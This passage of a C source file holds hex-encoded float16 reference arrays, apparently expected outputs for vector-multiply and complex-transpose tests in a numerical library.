0xb920, 0x3800, 0x27c2, 0xbdbc, 0xb895, 0xb92c, 0x3a98, 0x3438, 0x3d55, 0x2ecb, 0x38b8, 0xbe85, 0x320e, 0x3206, 0xac2a, 0x243e, 0xb484, 0x38ec, 0x3b12, 0x375d, 0x3514, 0xb9d7, 0x3532, 0xbc7d, 0xb5dd, 0xb022, 0x39f1, 0xb8af, 0x3a04, 0x33b6, 0xb823, 0x31b8, 0x3492, 0xb8d0, 0xb4ad, 0xb93b, 0xb83f, 0xb306, 0x3c94, 0x3962, 0xbe79, 0xc0d3, 0x4369, 0x3bbf, 0xb507, 0xb8f8, 0xb55a, 0xbe7f, 0x429f, 0xbd4b, 0x42ee, 0xb85b, 0x3287, 0xac7d, 0xc429, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0xb6ab, 0x3400, 0x3555, 0x0 }; static const uint16_t ref_vec_mult[392] = { 0x9539, 0x270a, 0x2578, 0x2cb1, 0xb730, 0xb0e7, 0xb28c, 0x9539, 0x263c, 0x270a, 0x28ef, 0x2578, 0x2948, 0x2cb1, 0x2cdc, 0xb730, 0xae06, 0xb0e7, 0x3465, 0xb28c, 0x338e, 0x9539, 0x263c, 0x2239, 0x270a, 0x28ef, 0xb003, 0x2578, 0x2948, 0x2aee, 0x2cb1, 0x2cdc, 0x25cc, 0xb730, 0xae06, 0xab18, 0xb0e7, 0x3465, 0x39d1, 0xb28c, 0x338e, 0xb174, 0x9539, 0x263c, 0x2239, 0x25b8, 0x270a, 0x28ef, 0xb003, 0x2cdc, 0x2578, 0x2948, 0x2aee, 0x2fb4, 0x2cb1, 0x2cdc, 0x25cc, 0x28ed, 0xb730, 0xae06, 0xab18, 0xb4cc, 0xb0e7, 0x3465, 0x39d1, 0x3441, 0xb28c, 0x338e, 0xb174, 0xb4a0, 0x9539, 0x263c, 0x2239, 0x25b8, 0xa587, 0xada0, 0xa55c, 0x270a, 0x28ef, 0xb003, 0x2cdc, 0x30b8, 0xab5e, 0xabdf, 0x2578, 0x2948, 0x2aee, 0x2fb4, 0xae03, 0x3131, 0xad27, 0x2cb1, 0x2cdc, 0x25cc, 0x28ed, 0x2ac4, 0x2e23, 0x2d00, 0xb730, 0xae06, 0xab18, 0xb4cc, 0x2fd9, 0x3191, 0x2efc, 0xb0e7, 0x3465, 0x39d1, 0x3441, 0xb57b, 0x2c67, 0x34f8, 0xb28c, 0x338e, 0xb174, 0xb4a0, 0xb949, 0x313d, 0x3a42, 0x9539, 0x263c, 0x2239, 0x25b8, 0xa587, 0xada0, 0xa55c, 0x2d3f, 0x2986, 0x2da7, 0x1cbf, 0xaabd, 0xa82d, 0xa642, 0x2c1a, 0x2b48, 0x270a, 0x28ef, 0xb003, 0x2cdc, 0x30b8, 0xab5e, 0xabdf, 0x3034, 0x2c53, 0xad2b, 0x27e7, 0xaaca, 0x2c2c, 0xabb5, 0xa67b, 0x2b93, 0x2578, 0x2948, 0x2aee, 0x2fb4, 0xae03, 0x3131, 0xad27, 0xabcc, 0x2de4, 0x2786, 0x2894, 0xaf0a, 0x3044, 0x2d94, 0x215c, 0xa52c, 0x2cb1, 0x2cdc, 0x25cc, 0x28ed, 0x2ac4, 0x2e23, 0x2d00, 0x2556, 0x3119, 0x2f14, 0x2e97, 0x2c43, 0x31d2, 0xa9bd, 0xabc1, 0x98d7, 0xb730, 0xae06, 0xab18, 0xb4cc, 0x2fd9, 0x3191, 0x2efc, 0xb759, 0xb70b, 0xb2ef, 0xa900, 0xb10f, 0xb554, 0xaba0, 0x31f9, 0xb1b2, 0xb0e7, 0x3465, 0x39d1, 0x3441, 0xb57b, 0x2c67, 0x34f8, 0xa3ba, 0x3879, 0x385f, 0xaba0, 0x2b72, 0xb441, 0xbc39, 0x3413, 0x3551, 0xb28c, 0x338e, 0xb174, 0xb4a0, 0xb949, 0x313d, 0x3a42, 0x3147, 0x37e1, 0xb98e, 0x1c3e, 0xac0f, 0xb566, 0xb5e6, 0xb7d6, 0x3c2e, 0x9539, 0x263c, 0x2239, 0x25b8, 0xa587, 0xada0, 0xa55c, 0x2d3f, 0x2986, 0x2da7, 0x1cbf, 0xaabd, 0xa82d, 0xa642, 0x2c1a, 0x2b48, 0x2d56, 0xa2dd, 0xab78, 0xa4dc, 0x9094, 0x26cf, 0xac62, 0x270a, 0x28ef, 0xb003, 0x2cdc, 0x30b8, 0xab5e, 0xabdf, 0x3034, 0x2c53, 0xad2b, 0x27e7, 0xaaca, 0x2c2c, 0xabb5, 0xa67b, 0x2b93, 0x2c2d, 0xacdd, 0x30a2, 0x21b1, 0xae58, 0x2610, 0x2568, 0x2578, 0x2948, 0x2aee, 0x2fb4, 0xae03, 0x3131, 0xad27, 0xabcc, 0x2de4, 0x2786, 0x2894, 0xaf0a, 0x3044, 0x2d94, 0x215c, 0xa52c, 0x2c17, 0x263a, 0xb004, 0x2d24, 0xac1b, 0x2029, 0xadc5, 0x2cb1, 0x2cdc, 0x25cc, 0x28ed, 0x2ac4, 0x2e23, 0x2d00, 0x2556, 0x3119, 0x2f14, 0x2e97, 0x2c43, 0x31d2, 0xa9bd, 0xabc1, 0x98d7, 0xb250, 0xb0a8, 0xa390, 0x2610, 0x9ab7, 0xb06e, 0x2de8, 0xb730, 0xae06, 0xab18, 0xb4cc, 0x2fd9, 0x3191, 0x2efc, 0xb759, 0xb70b, 0xb2ef, 0xa900, 0xb10f, 0xb554, 0xaba0, 0x31f9, 0xb1b2, 0xb1b4, 0xac09, 0x3538, 0x3479, 0x36f8, 0x3545, 0xb364, 0xb0e7, 0x3465, 0x39d1, 0x3441, 0xb57b, 0x2c67, 0x34f8, 0xa3ba, 0x3879, 0x385f, 0xaba0, 0x2b72, 0xb441, 0xbc39, 0x3413, 0x3551, 0xb913, 0x3698, 0x35fc, 0xb41d, 0xb41d, 0xb1a6, 0x307e, 0xb28c, 0x338e, 0xb174, 0xb4a0, 0xb949, 0x313d, 0x3a42, 0x3147, 0x37e1, 0xb98e, 0x1c3e, 0xac0f, 0xb566, 0xb5e6, 0xb7d6, 0x3c2e, 0xb405, 0x3b5b, 0xb208, 0xb3d4, 0x3a3b, 0xb571, 0xac21 }; static const uint16_t ref_cmplx_trans[6272] = { 0x2ed0, 0x34a0, 0x2ed0, 0x34a0, 0x3420, 0x36b3, 0x2ed0, 0x34a0, 0x3420, 0x36b3, 0xb2c4, 0xad9e, 0x2ed0, 0x34a0, 0x3420, 0x36b3, 0xb2c4, 0xad9e, 0xb54a, 0x301f, 0x2ed0, 0x34a0, 0x3420, 0x36b3, 0xb2c4, 0xad9e, 0xb54a, 0x301f, 0xb19b, 0xb30f, 0x3326, 0xb2e1, 0x34db, 0x36c6, 0x2ed0, 0x34a0, 0x3420, 0x36b3, 0xb2c4, 0xad9e, 0xb54a, 0x301f, 0xb19b, 0xb30f, 0x3326, 0xb2e1, 0x34db, 0x36c6, 0x3274, 0x2099, 0x135c, 0xb8af, 0xb7fd, 0x30e9, 0xa11f, 0xaeec, 0x3594, 0x3342, 0x3343, 0x2c4a, 0x31ff, 0x3751, 0xb4ff, 0x34eb, 0x3612, 0x27a6, 0x2ed0, 0x34a0, 0x3420, 0x36b3, 0xb2c4, 0xad9e, 0xb54a, 0x301f, 0xb19b, 0xb30f, 0x3326, 0xb2e1, 0x34db, 0x36c6, 0x3274, 0x2099, 0x135c, 0xb8af, 0xb7fd, 0x30e9, 0xa11f, 0xaeec, 0x3594, 0x3342, 0x3343, 0x2c4a, 0x31ff, 0x3751, 0xb4ff, 0x34eb, 0x3612, 0x27a6, 0x2e86, 0xb400, 0xa474, 0x2fe4, 0x302d, 0x3508, 0x3939, 0x1db0, 0xb66f, 0x184a, 0x3463, 0xa761, 0xadff, 0xa93a, 0x2ed0, 0x34a0, 0x3420, 0x36b3, 0x2ed0, 0x34a0, 0xb2c4, 0xad9e, 0x3420, 0x36b3, 0xb54a, 0x301f, 0x2ed0, 0x34a0, 0xb54a, 0x301f, 0x3420, 0x36b3, 0xb19b, 0xb30f, 0xb2c4, 0xad9e, 0x3326, 0xb2e1, 0x2ed0, 0x34a0, 0xb19b, 0xb30f, 0x3420, 0x36b3, 0x3326, 0xb2e1, 0xb2c4, 0xad9e, 0x34db, 0x36c6, 0xb54a, 0x301f, 0x3274, 0x2099, 0x2ed0, 0x34a0, 0x3274, 0x2099, 0x3420, 0x36b3, 0x135c, 0xb8af, 0xb2c4, 0xad9e, 0xb7fd, 0x30e9, 0xb54a, 0x301f, 0xa11f, 0xaeec, 0xb19b, 0xb30f, 0x3594, 0x3342, 0x3326, 0xb2e1, 0x3343, 0x2c4a, 0x34db, 0x36c6, 0x31ff, 0x3751, 0x2ed0, 0x34a0, 0x2e86, 0xb400, 0x3420, 0x36b3, 0xa474, 0x2fe4, 0xb2c4, 0xad9e, 0x302d, 0x3508, 0xb54a, 0x301f, 0x3939, 0x1db0, 0xb19b, 0xb30f, 0xb66f, 0x184a, 0x3326, 0xb2e1, 0x3463, 0xa761, 0x34db, 0x36c6, 0xadff, 0xa93a, 0x3274, 0x2099, 0x33fc, 0xb288, 0x135c, 0xb8af, 0x302e, 0x3013, 0xb7fd, 0x30e9, 0xb2ca, 0x3157, 0xa11f, 0xaeec, 0x34bf, 0xb02d, 0x3594, 0x3342, 0xb1f3, 0x3554, 0x3343, 0x2c4a, 0x3418, 0xb096, 0x31ff, 0x3751, 0x3495, 0xb583, 0xb4ff, 0x34eb, 0x2d40, 0x3020, 0x3612, 0x27a6, 0x3140, 0xae42, 0x2ed0, 0x34a0, 0x33fc, 0xb288, 0x3420, 0x36b3, 0x302e, 0x3013, 0xb2c4, 0xad9e, 0xb2ca, 0x3157, 0xb54a, 0x301f, 0x34bf, 0xb02d, 0xb19b, 0xb30f, 0xb1f3, 0x3554, 0x3326, 0xb2e1, 0x3418, 0xb096, 0x34db, 0x36c6, 0x3495, 0xb583, 0x3274, 0x2099, 0x2d40, 0x3020, 0x135c, 0xb8af, 0x3140, 0xae42, 0xb7fd, 0x30e9, 0xb902, 0xac20, 0xa11f, 0xaeec, 0x283a, 0xad51, 0x3594, 0x3342, 0x3178, 0x322c, 0x3343, 0x2c4a, 0xb4d9, 0xb4ec, 0x31ff, 0x3751, 0x3435, 0xb5c7, 0xb4ff, 0x34eb, 0xb4bf, 0xb12b, 0x3612, 0x27a6, 0x2711, 0xb1af, 0x2e86, 0xb400, 0xac6a, 0x2b50, 0xa474, 0x2fe4, 0xb049, 0xa846, 0x302d, 0x3508, 0x2ecc, 0xaeb8, 0x3939, 0x1db0, 0xa639, 0xb24a, 0xb66f, 0x184a, 0xb0d7, 0x2a40, 0x3463, 0xa761, 0x20f7, 0xa2c2, 0xadff, 0xa93a, 0x2c6e, 0x38bc, 0x2ed0, 0x34a0, 0x3420, 0x36b3, 0xb2c4, 0xad9e, 0x2ed0, 0x34a0, 0xb2c4, 0xad9e, 0xb19b, 0xb30f, 0x3420, 0x36b3, 0xb54a, 0x301f, 0x3326, 0xb2e1, 0x2ed0, 0x34a0, 0xb54a, 0x301f, 0x34db, 0x36c6, 0x3420, 0x36b3, 0xb19b, 0xb30f, 0x3274, 0x2099, 0xb2c4, 0xad9e, 0x3326, 0xb2e1, 0x135c, 0xb8af, 0x2ed0, 0x34a0, 0xb19b, 0xb30f, 0x135c, 0xb8af, 0x3420, 0x36b3, 0x3326, 0xb2e1, 0xb7fd, 0x30e9, 0xb2c4, 0xad9e, 0x34db, 0x36c6, 0xa11f, 0xaeec, 0xb54a, 0x301f, 0x3274, 0x2099, 0x3594, 0x3342, 0x2ed0, 0x34a0, 0x3274, 0x2099, 0xb4ff, 0x34eb, 0x3420, 0x36b3, 0x135c, 0xb8af, 0x3612, 0x27a6, 0xb2c4, 0xad9e, 0xb7fd, 0x30e9, 0x2e86, 0xb400, 0xb54a, 0x301f, 0xa11f, 0xaeec, 0xa474, 0x2fe4, 0xb19b, 0xb30f, 0x3594, 0x3342, 0x302d, 0x3508, 0x3326, 0xb2e1, 0x3343, 0x2c4a, 0x3939, 0x1db0, 0x34db, 0x36c6, 0x31ff, 0x3751, 0xb66f, 0x184a, 0x2ed0, 0x34a0, 0x2e86, 0xb400, 0xb902, 0xac20, 0x3420, 0x36b3, 0xa474, 0x2fe4, 0x283a, 0xad51, 0xb2c4, 0xad9e, 0x302d, 0x3508, 0x3178, 0x322c, 0xb54a, 0x301f, 0x3939, 0x1db0, 0xb4d9, 0xb4ec, 0xb19b, 0xb30f, 0xb66f, 0x184a, 0x3435, 0xb5c7, 0x3326, 0xb2e1, 0x3463, 0xa761, 0xb4bf, 0xb12b, 0x34db, 0x36c6, 0xadff, 0xa93a, 0x2711, 0xb1af, 0x3274, 0x2099, 0x33fc, 0xb288, 0xac6a, 0x2b50, 0x135c, 0xb8af, 0x302e, 0x3013, 0xb049, 0xa846, 0xb7fd, 0x30e9, 0xb2ca, 0x3157, 0x2ecc, 0xaeb8, 0xa11f, 0xaeec, 0x34bf, 0xb02d, 0xa639, 0xb24a, 0x3594, 0x3342, 0xb1f3, 0x3554, 0xb0d7, 0x2a40, 0x3343, 0x2c4a, 0x3418, 0xb096, 0x20f7, 0xa2c2, 0x31ff, 0x3751, 0x3495, 0xb583, 0x2c6e, 0x38bc, 0xb4ff, 0x34eb, 0x2d40, 0x3020, 0x3469, 0xb18c, 0x3612, 0x27a6, 0x3140, 0xae42, 0x3199, 0x3538, 0x2ed0, 0x34a0, 0x33fc, 0xb288, 0x3469, 0xb18c, 0x3420, 0x36b3, 0x302e, 0x3013, 0x3199, 0x3538, 0xb2c4, 0xad9e, 0xb2ca, 0x3157, 0xb0c6, 0x2ced, 0xb54a, 0x301f, 0x34bf, 0xb02d, 0x2e59, 0xaf8f, 0xb19b, 0xb30f, 0xb1f3, 0x3554, 0xaf15, 0xa347, 0x3326, 0xb2e1, 0x3418, 0xb096, 0xb0ef, 0xb505, 0x34db, 0x36c6, 0x3495, 0xb583, 0xb63f, 0xb0b6, 0x3274, 0x2099, 0x2d40, 0x3020, 0x35f8, 0xaea7, 0x135c, 0xb8af, 0x3140, 0xae42, 0x3765, 0x314f, 0xb7fd, 0x30e9, 0xb902, 0xac20, 0x3457, 0x3419, 0xa11f, 0xaeec, 0x283a, 0xad51, 0xb560, 0x32fe, 0x3594, 0x3342, 0x3178, 0x322c, 0xb461, 0xb2e7, 0x3343, 0x2c4a, 0xb4d9, 0xb4ec, 0xb1c8, 0x38ba, 0x31ff, 0x3751, 0x3435, 0xb5c7, 0x30c7, 0x2bfc, 0xb4ff, 0x34eb, 0xb4bf, 0xb12b, 0xa2ff, 0x3708, 0x3612, 0x27a6, 0x2711, 0xb1af, 0x3677, 0xaa64, 0x2e86, 0xb400, 0xac6a, 0x2b50, 0x34af, 0xb76c, 0xa474, 0x2fe4, 0xb049, 0xa846, 0xb2f1, 0xb1bd, 0x302d, 0x3508, 0x2ecc, 0xaeb8, 0x2d9f, 0xb64c, 0x3939, 0x1db0, 0xa639, 0xb24a, 0x31ce, 0x2b87, 0xb66f, 0x184a, 0xb0d7, 0x2a40, 0xb848, 0xb062, 0x3463, 0xa761, 0x20f7, 0xa2c2, 0xaf0b, 0x32a3, 0xadff, 0xa93a, 0x2c6e, 0x38bc, 0xb4ca, 0x36aa, 0x2ed0, 0x34a0, 0x3420, 0x36b3, 0xb2c4, 0xad9e, 0xb54a, 0x301f, 0x2ed0, 0x34a0, 0xb2c4, 0xad9e, 0xb19b, 0xb30f, 0x34db, 0x36c6, 0x3420, 0x36b3, 0xb54a, 0x301f, 0x3326, 0xb2e1, 0x3274, 0x2099, 0x2ed0, 0x34a0, 0xb54a, 0x301f, 0x34db, 0x36c6, 0xb7fd, 0x30e9, 0x3420, 0x36b3, 0xb19b, 0xb30f, 0x3274, 0x2099, 0xa11f, 0xaeec, 0xb2c4, 0xad9e, 0x3326, 0xb2e1, 0x135c, 0xb8af, 0x3594, 0x3342, 0x2ed0, 0x34a0, 0xb19b, 0xb30f, 0x135c, 0xb8af, 0x3343, 0x2c4a, 0x3420, 0x36b3, 0x3326, 0xb2e1, 0xb7fd, 0x30e9, 0x31ff, 0x3751, 0xb2c4, 0xad9e, 0x34db, 0x36c6, 0xa11f, 0xaeec, 0xb4ff, 0x34eb, 0xb54a, 0x301f, 0x3274, 0x2099, 0x3594, 0x3342, 0x3612, 0x27a6, 0x2ed0, 0x34a0, 0x3274, 0x2099, 0xb4ff, 0x34eb, 0x3463, 0xa761, 0x3420, 0x36b3, 0x135c, 0xb8af, 0x3612, 0x27a6, 0xadff, 0xa93a, 0xb2c4, 0xad9e, 0xb7fd, 0x30e9, 0x2e86, 0xb400, 0x33fc, 0xb288, 0xb54a, 0x301f, 0xa11f, 0xaeec, 0xa474, 0x2fe4, 0x302e, 0x3013, 0xb19b, 0xb30f, 0x3594, 0x3342, 0x302d, 0x3508, 0xb2ca, 0x3157, 0x3326, 0xb2e1, 0x3343, 0x2c4a, 0x3939, 0x1db0, 0x34bf, 0xb02d, 0x34db, 0x36c6, 0x31ff, 0x3751, 0xb66f, 0x184a, 0xb1f3, 0x3554, 0x2ed0, 0x34a0, 0x2e86, 0xb400, 0xb902, 0xac20, 0xb0c6, 0x2ced, 0x3420, 0x36b3, 0xa474, 0x2fe4, 0x283a, 0xad51, 0x2e59, 0xaf8f, 0xb2c4, 0xad9e, 0x302d, 0x3508, 0x3178, 0x322c, 0xaf15, 0xa347, 0xb54a, 0x301f, 0x3939, 0x1db0, 0xb4d9, 0xb4ec, 0xb0ef, 0xb505, 0xb19b, 0xb30f, 0xb66f, 0x184a, 0x3435, 0xb5c7, 0xb63f, 0xb0b6, 0x3326, 0xb2e1, 0x3463, 0xa761, 0xb4bf, 0xb12b, 0x35f8, 0xaea7, 0x34db, 0x36c6, 0xadff, 0xa93a, 0x2711, 0xb1af, 0x3765, 0x314f, 0x3274, 0x2099, 0x33fc, 0xb288, 0xac6a, 0x2b50, 0x3457, 0x3419, 0x135c, 0xb8af, 0x302e, 0x3013, 0xb049, 0xa846, 0xb560, 0x32fe, 0xb7fd, 0x30e9, 0xb2ca, 0x3157, 0x2ecc, 0xaeb8, 0xb461, 0xb2e7, 0xa11f, 0xaeec, 0x34bf, 0xb02d, 0xa639, 0xb24a, 0xb1c8, 0x38ba, 0x3594, 0x3342, 0xb1f3, 0x3554, 0xb0d7, 0x2a40, 0x30c7, 0x2bfc, 0x3343, 0x2c4a, 0x3418, 0xb096, 0x20f7, 0xa2c2, 0xa2ff, 0x3708, 0x31ff, 0x3751, 0x3495, 0xb583, 0x2c6e, 0x38bc, 0x3677, 0xaa64, 0xb4ff, 0x34eb, 0x2d40, 0x3020, 0x3469, 0xb18c, 0x34af, 0xb76c, 0x3612, 0x27a6, 0x3140, 0xae42, 0x3199, 0x3538, 0xb2f1, 0xb1bd, 0x2ed0, 0x34a0, 0x33fc, 0xb288, 0x3469, 0xb18c, 0x3549, 0xb45f, 0x3420, 0x36b3, 0x302e, 0x3013, 0x3199, 0x3538, 0x2f96, 0xb104, 0xb2c4, 0xad9e, 0xb2ca, 0x3157, 0xb0c6, 0x2ced, 0xac74, 0xa4b4, 0xb54a, 0x301f, 0x34bf, 0xb02d, 0x2e59, 0xaf8f, 0xa453, 0x3279, 0xb19b, 0xb30f, 0xb1f3, 0x3554, 0xaf15, 0xa347, 0xac7b, 0x31de, 0x3326, 0xb2e1, 0x3418, 0xb096, 0xb0ef, 0xb505, 0x3515, 0xb3b7, 0x34db, 0x36c6, 0x3495, 0xb583, 0xb63f, 0xb0b6, 0xb825, 0xb3d7, 0x3274, 0x2099, 0x2d40, 0x3020, 0x35f8, 0xaea7, 0x3419, 0x33a9, 0x135c, 0xb8af, 0x3140, 0xae42, 0x3765, 0x314f, 0x33ae, 0x377a, 0xb7fd, 0x30e9, 0xb902, 0xac20, 0x3457, 0x3419, 0x28da, 0x303d, 0xa11f, 0xaeec, 0x283a, 0xad51, 0xb560, 0x32fe, 0x1067, 0x3537, 0x3594, 0x3342, 0x3178, 0x322c, 0xb461, 0xb2e7, 0xb6d9, 0xb7d4, 0x3343, 0x2c4a, 0xb4d9, 0xb4ec, 0xb1c8, 0x38ba, 0x2ce3, 0xb43e, 0x31ff, 0x3751, 0x3435, 0xb5c7, 0x30c7, 0x2bfc, 0x3733, 0xb604, 0xb4ff, 0x34eb, 0xb4bf, 0xb12b, 0xa2ff, 0x3708, 0x356c, 0x3647, 0x3612, 0x27a6, 0x2711, 0xb1af, 0x3677, 0xaa64, 0xb055, 0x2e8b, 0x2e86, 0xb400, 0xac6a, 0x2b50, 0x34af, 0xb76c, 0x2daa, 0x358a, 0xa474, 0x2fe4, 0xb049, 0xa846, 0xb2f1, 0xb1bd, 0xb241, 0x33c6, 0x302d, 0x3508, 0x2ecc, 0xaeb8, 0x2d9f, 0xb64c, 0xb451, 0xb83e, 0x3939, 0x1db0, 0xa639, 0xb24a, 0x31ce, 0x2b87, 0x361d, 0xb09c, 0xb66f, 0x184a, 0xb0d7, 0x2a40, 0xb848, 0xb062, 0xa6b2, 0x2fc0, 0x3463, 0xa761, 0x20f7, 0xa2c2, 0xaf0b, 0x32a3, 0x3861, 0x3048, 0xadff, 0xa93a, 0x2c6e, 0x38bc, 0xb4ca, 0x36aa, 0x2ff5, 0x2c0d, 0x2ed0, 0x34a0, 0x3420, 0x36b3, 0xb2c4, 0xad9e, 0xb54a, 0x301f, 0xb19b, 0xb30f, 0x3326, 0xb2e1, 0x34db, 0x36c6, 0x2ed0, 0x34a0, 0xb2c4, 0xad9e, 0xb19b, 0xb30f, 0x34db, 0x36c6, 0x135c, 0xb8af, 0xa11f, 0xaeec, 0x3343, 0x2c4a, 0x3420, 0x36b3, 0xb54a, 0x301f, 0x3326, 0xb2e1, 0x3274, 0x2099, 0xb7fd, 0x30e9, 0x3594, 0x3342, 0x31ff, 0x3751, 0x2ed0, 0x34a0, 0xb54a, 0x301f, 0x34db, 0x36c6, 0xb7fd, 0x30e9, 0x3343, 0x2c4a, 0x3612, 0x27a6, 0x302d, 0x3508, 0x3420, 0x36b3, 0xb19b, 0xb30f, 0x3274, 0x2099, 0xa11f, 0xaeec, 0x31ff, 0x3751, 0x2e86, 0xb400, 0x3939, 0x1db0, 0xb2c4, 0xad9e, 0x3326, 0xb2e1, 0x135c, 0xb8af, 0x3594, 0x3342, 0xb4ff, 0x34eb, 0xa474, 0x2fe4, 0xb66f, 0x184a, 0x2ed0, 0x34a0, 0xb19b, 0xb30f, 0x135c, 0xb8af, 0x3343, 0x2c4a, 0x2e86, 0xb400, 0xb66f, 0x184a, 0x302e, 0x3013, 0x3420, 0x36b3, 0x3326, 0xb2e1, 0xb7fd, 0x30e9, 0x31ff, 0x3751, 0xa474, 0x2fe4, 0x3463, 0xa761, 0xb2ca, 0x3157, 0xb2c4, 0xad9e, 0x34db, 0x36c6, 0xa11f, 0xaeec, 0xb4ff, 0x34eb, 0x302d, 0x3508, 0xadff, 0xa93a, 0x34bf, 0xb02d, 0xb54a, 0x301f, 0x3274, 0x2099, 0x3594, 0x3342, 0x3612, 0x27a6, 0x3939, 0x1db0, 0x33fc, 0xb288, 0xb1f3, 0x3554, 0x2ed0, 0x34a0, 0x3274, 0x2099, 0xb4ff, 0x34eb, 0x3463, 0xa761, 0x3418, 0xb096, 0xb4d9, 0xb4ec, 0xa639, 0xb24a, 0x3420, 0x36b3, 0x135c, 0xb8af, 0x3612, 0x27a6, 0xadff, 0xa93a, 0x3495, 0xb583, 0x3435, 0xb5c7, 0xb0d7, 0x2a40, 0xb2c4, 0xad9e, 0xb7fd, 0x30e9, 0x2e86, 0xb400, 0x33fc, 0xb288, 0x2d40, 0x3020, 0xb4bf, 0xb12b, 0x20f7, 0xa2c2, 0xb54a, 0x301f, 0xa11f, 0xaeec, 0xa474, 0x2fe4, 0x302e, 0x3013, 0x3140, 0xae42, 0x2711, 0xb1af, 0x2c6e, 0x38bc, 0xb19b, 0xb30f, 0x3594, 0x3342, 0x302d, 0x3508, 0xb2ca, 0x3157, 0xb902, 0xac20, 0xac6a, 0x2b50, 0x3469, 0xb18c, 0x3326, 0xb2e1, 0x3343, 0x2c4a, 0x3939, 0x1db0, 0x34bf, 0xb02d, 0x283a, 0xad51, 0xb049, 0xa846, 0x3199, 0x3538, 0x34db, 0x36c6, 0x31ff, 0x3751, 0xb66f, 0x184a, 0xb1f3, 0x3554, 0x3178, 0x322c, 0x2ecc, 0xaeb8, 0xb0c6, 0x2ced, 0x2ed0, 0x34a0, 0x2e86, 0xb400, 0xb902, 0xac20, 0xb0c6, 0x2ced, 0x2d9f, 0xb64c, 0xb6d9, 0xb7d4, 0x2a19, 0xaed8, 0x3420, 0x36b3, 0xa474, 0x2fe4, 0x283a, 0xad51, 0x2e59, 0xaf8f, 0x31ce, 0x2b87, 0x2ce3, 0xb43e, 0xb593, 0xb475, 0xb2c4, 0xad9e, 0x302d, 0x3508, 0x3178, 0x322c, 0xaf15, 0xa347, 0xb848, 0xb062, 0x3733, 0xb604, 0xa702, 0xb1e8, 0xb54a, 0x301f, 0x3939, 0x1db0, 0xb4d9, 0xb4ec, 0xb0ef, 0xb505, 0xaf0b, 0x32a3, 0x356c, 0x3647, 0xb76c, 0xafd0, 0xb19b, 0xb30f, 0xb66f, 0x184a, 0x3435, 0xb5c7, 0xb63f, 0xb0b6, 0xb4ca, 0x36aa, 0xb055, 0x2e8b, 0x34dc, 0x2fb0, 0x3326, 0xb2e1, 0x3463, 0xa761, 0xb4bf, 0xb12b, 0x35f8, 0xaea7, 0x3549, 0xb45f, 0x2daa, 0x358a, 0xb0bb, 0x3422, 0x34db, 0x36c6, 0xadff, 0xa93a, 0x2711, 0xb1af, 0x3765, 0x314f, 0x2f96, 0xb104, 0xb241, 0x33c6, 0xa5bf, 0xb11d, 0x3274, 0x2099, 0x33fc, 0xb288, 0xac6a, 0x2b50, 0x3457, 0x3419, 0xac74, 0xa4b4, 0xb451, 0xb83e, 0xb64c, 0xb20a, 0x135c, 0xb8af, 0x302e, 0x3013, 0xb049, 0xa846, 0xb560, 0x32fe, 0xa453, 0x3279, 0x361d, 0xb09c, 0xb371, 0x2d83, 0xb7fd, 0x30e9, 0xb2ca, 0x3157, 0x2ecc, 0xaeb8, 0xb461, 0xb2e7, 0xac7b, 0x31de, 0xa6b2, 0x2fc0, 0x26b6, 0x3564, 0xa11f, 0xaeec, 0x34bf, 0xb02d, 0xa639, 0xb24a, 0xb1c8, 0x38ba, 0x3515, 0xb3b7, 0x3861, 0x3048, 0x2f14, 0xb846, 0x3594, 0x3342, 0xb1f3, 0x3554, 0xb0d7, 0x2a40, 0x30c7, 0x2bfc, 0xb825, 0xb3d7, 0x2ff5, 0x2c0d, 0xb329, 0x2ce7, 0x3343, 0x2c4a, 0x3418, 0xb096, 0x20f7, 0xa2c2, 0xa2ff, 0x3708, 0x3419, 0x33a9, 0x38cb, 0x31ce, 0x3971, 0x3453, 0x31ff, 0x3751, 0x3495, 0xb583, 0x2c6e, 0x38bc, 0x3677, 0xaa64, 0x33ae, 0x377a, 0xb404, 0x3566, 0x3465, 0xb39a, 0xb4ff, 0x34eb, 0x2d40, 0x3020, 0x3469, 0xb18c, 0x34af, 0xb76c, 0x28da, 0x303d, 